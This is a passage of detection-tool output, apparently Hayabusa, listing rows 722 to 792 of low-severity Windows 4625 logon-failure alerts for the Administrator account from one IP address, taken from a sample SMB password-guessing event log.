| 722 | 2016-09-20 01:50:09.631 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: mk0BAdOI210HwPhX : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 723 | 2016-09-20 01:50:09.686 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: wSwWz57Kvl2XJVUR : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 724 | 2016-09-20 01:50:09.720 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: DLcfSrHT5bSsNnuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 725 | 2016-09-20 01:50:09.760 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: rQDkbESps0PXWEUT : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 726 | 2016-09-20 01:50:09.797 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ZpnyzkXasuyAtdn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 727 | 2016-09-20 01:50:09.840 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ps9IqJzTliJvzpIS : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 728 | 2016-09-20 01:50:09.876 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: V7PLb2uRTIY8t123 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 729 | 2016-09-20 01:50:09.921 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: sHAJ9p0QbSRxhvtk : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 730 | 2016-09-20 01:50:09.968 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: YRiE1wGrwWAx0feP : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 731 | 2016-09-20 01:50:10.016 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Flo4bCVjmlaHz0QS : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 732 | 2016-09-20 01:50:10.061 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: HscUujSzd3Ua7dqg : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 733 | 2016-09-20 01:50:10.156 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: aIQPTx67aEer51wb : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 734 | 2016-09-20 01:50:10.191 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MqUoXUf7PKIaoDjs : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 735 | 2016-09-20 01:50:10.222 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: wzeB4DAS1W633tmh : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 736 | 2016-09-20 01:50:10.263 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: UTtXTrqHoCZMbDLT : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 737 | 2016-09-20 01:50:10.311 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 4HVv5PgPhiDW3qcj : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 738 | 2016-09-20 01:50:10.344 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: g21VoO45UrIbTuZO : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 739 | 2016-09-20 01:50:10.383 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: rGpD7AJUTekDmd6Q : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 740 | 2016-09-20 01:50:10.423 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: OykzTOn7B9THv0cT : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 741 | 2016-09-20 01:50:10.462 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: cIYOrBBwX8nFpCzw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 742 | 2016-09-20 01:50:10.508 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: SvnROHLMVnmPfAyy : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 743 | 2016-09-20 01:50:10.547 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5EwJ84H7kXQXzGZz : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 744 | 2016-09-20 01:50:10.580 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 34RLeLWDgLayU3JM : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 745 | 2016-09-20 01:50:10.619 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QaXHGUgboODAi5Qu : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 746 | 2016-09-20 01:50:10.659 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QlOlZ0m397CsmaeD : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 747 | 2016-09-20 01:50:10.699 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: N24rSPCI8DsQIPXR : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 748 | 2016-09-20 01:50:10.738 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5y2tgoUcs6mFPZm4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 749 | 2016-09-20 01:50:10.776 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: HmFX6MioYqaMumgw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 750 | 2016-09-20 01:50:10.820 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: R4HRWlPWPKy1Cicq : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 751 | 2016-09-20 01:50:10.869 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: GDUf7wVbHkS9uaPC : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 752 | 2016-09-20 01:50:10.917 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: eBX0Lviz6Bv5rGcb : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 753 | 2016-09-20 01:50:10.956 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: zZwPm9qahLU78FRY : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 754 | 2016-09-20 01:50:11.008 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: jOVsopykTHNQcYUp : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 755 | 2016-09-20 01:50:11.060 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: n8DY7sdDY8nuWdME : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 756 | 2016-09-20 01:50:11.105 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: rTxEVu7mudXEBARZ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 757 | 2016-09-20 01:50:11.148 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 7ohqvCoOLkFRcqvE : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 758 | 2016-09-20 01:50:11.180 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: me8rikVJqcKxvHdq : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 759 | 2016-09-20 01:50:11.228 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: oLqVmqCmHTrD7V8V : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 760 | 2016-09-20 01:50:11.269 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5ySdyzxvDasHgjq0 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 761 | 2016-09-20 01:50:11.312 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: N2auwOc1wemq76n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 762 | 2016-09-20 01:50:11.348 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: RgK6lHgC5WOBk4kW : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 763 | 2016-09-20 01:50:11.389 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 2GG0bKgusKqseQij : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 764 | 2016-09-20 01:50:11.432 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MpHm7DcOmhq4rkaX : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 765 | 2016-09-20 01:50:11.468 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: OX1vVGrE7fJSMEiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 766 | 2016-09-20 01:50:11.508 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 65i7wtyAhL58QrzC : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 767 | 2016-09-20 01:50:11.551 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: k8uSVFRTLTB6g1eg : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 768 | 2016-09-20 01:50:11.592 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ire6VOUMWZQnNjES : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 769 | 2016-09-20 01:50:11.629 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: pGWnvKUXnbJvRqql : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 770 | 2016-09-20 01:50:11.666 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: xBVvrrLf1rnAviKS : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 771 | 2016-09-20 01:50:11.704 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: NE9atGNBlSLQLLcX : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 772 | 2016-09-20 01:50:11.744 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: a0M5EaAXziu07hOH : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 773 | 2016-09-20 01:50:11.784 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: PM1mwxqI7yVgoK2D : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 774 | 2016-09-20 01:50:11.836 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MPqnpvetHXdThxYg : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 775 | 2016-09-20 01:50:11.879 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: gthbVQMJ7UD2QS7H : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 776 | 2016-09-20 01:50:11.920 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: AwwJXCoC3gMDoDn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 777 | 2016-09-20 01:50:12.068 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ilNNoVbZpyhtsNkV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 778 | 2016-09-20 01:50:12.109 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: eNY0lv9IglfHP34d : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 779 | 2016-09-20 01:50:12.167 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BjSeQciwy17L7raV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 780 | 2016-09-20 01:50:12.208 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: wycE1fIsmPq9zaMU : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 781 | 2016-09-20 01:50:12.241 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5z1spxImm2ZlGOld : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 782 | 2016-09-20 01:50:12.294 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Dg7o4GCET1bJrlEU : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 783 | 2016-09-20 01:50:12.376 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: E7Db3OLA0XPXL1B4 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 784 | 2016-09-20 01:50:12.417 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Uoqx5iPRp2tfYYos : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 785 | 2016-09-20 01:50:12.448 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Ixw5XWC2frtrTUkv : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 786 | 2016-09-20 01:50:12.495 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 3v0NpzAp7io9gbZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 787 | 2016-09-20 01:50:12.536 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: AfOOiR2zO5xem9Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 788 | 2016-09-20 01:50:12.582 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: yiGtitRqZbGNKrtN : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 789 | 2016-09-20 01:50:12.623 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 7oQ70LvSMnGxBCFO : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 790 | 2016-09-20 01:50:12.660 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: JGHr8623vHZyMY5B : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 791 | 2016-09-20 01:50:12.707 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: X5Y1C9A4XqxQGoVA : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 792 | 2016-09-20 01:50:12.745 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: SOnirLGOZzRVSt3y : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
